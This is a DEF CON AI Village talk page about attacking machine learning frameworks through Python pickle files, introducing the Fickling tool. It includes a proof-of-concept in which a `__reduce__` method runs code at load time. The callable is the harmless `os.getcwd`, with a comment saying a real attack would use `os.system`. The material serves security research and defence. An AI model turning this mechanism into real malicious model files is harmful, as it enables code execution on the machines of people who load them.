---
title: "Never a Dill Moment: Exploiting Machine Learning Pickle Files"
date: 2021-08
authors:
  - Carson Harmon
  - Evan Sultanik
  - Jim Miller
  - Suha Hussain
conference: AI Village at DEF CON 29
resources:
  - label: Slides
    path: DEFCON AI Village Fickling Talk.pdf
---

Machine learning models are often stored as Python pickle files because they conserve memory, enable start-and-stop model training, and are easy to share. However, pickle files permit arbitrary code execution when deserialized, making them dangerous to load from an untrusted source. This talk covers research on model-sharing services like PyTorch Hub and introduces Fickling, an open-source pickle decompiler and code-injection tool. Fickling allows penetration testers and red teamers to create malicious model files that can attack machine learning frameworks like PyTorch and spaCy, demonstrating the wide variety of attacks made possible by the inherently vulnerable design of pickle files.
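The root of the vulnerability is pickle's `__reduce__` protocol, which lets a serialized object name an arbitrary callable (with arguments) that the interpreter invokes during deserialization. A minimal sketch of the attack class the talk describes, using only the standard library and a deliberately benign callable (`os.getcwd` stands in for what would be `os.system` or similar in a real payload):

```python
import os
import pickle


class Payload:
    """An object whose deserialization runs attacker-chosen code."""

    def __reduce__(self):
        # pickle will call this callable with these arguments at load
        # time. Here we use the benign os.getcwd; a real attack would
        # substitute os.system, subprocess.Popen, etc.
        return (os.getcwd, ())


# The attacker serializes the payload into what looks like an
# ordinary pickle file (e.g., embedded inside a model checkpoint).
malicious_bytes = pickle.dumps(Payload())

# The victim merely loads the data -- the callable executes
# immediately, before any model object is even inspected.
result = pickle.loads(malicious_bytes)
print(result)  # prints the current working directory, proving execution
```

Fickling automates injecting this kind of payload into existing model files and decompiling pickles to inspect them for such constructs; the snippet above only illustrates the underlying mechanism, not Fickling's API.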